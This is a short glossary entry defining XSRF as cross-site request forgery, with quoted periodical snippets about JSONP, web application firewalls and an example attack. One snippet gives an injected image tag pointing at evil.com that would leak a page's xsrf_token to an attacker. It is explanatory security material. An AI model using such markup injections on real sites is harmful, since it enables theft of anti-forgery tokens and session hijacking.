XSRF


(Cross-Site Request Forgery) See CSRF.
References in periodicals archive
JSONP is a popular method for building JavaScript APIs, such as integrating with third-party services (e.g., to implement search or mapping capabilities) and retrieving private first-party data (e.g., an additional referer check or an XSRF token).
A typical example is [<img src='http://evil.com?.bar] ... legitimate code <input name="xsrf_token" value="123"> ... legitimate code' ... legitimate code <div> where the underlined part is injected by attackers and the request for the image will carry the sensitive information.
Ultimately, a WAF is capable of uncovering fraudulent use of parameters (XSS, XSRF, SQL injection, parameter tampering, etc.) without specific knowledge of an application.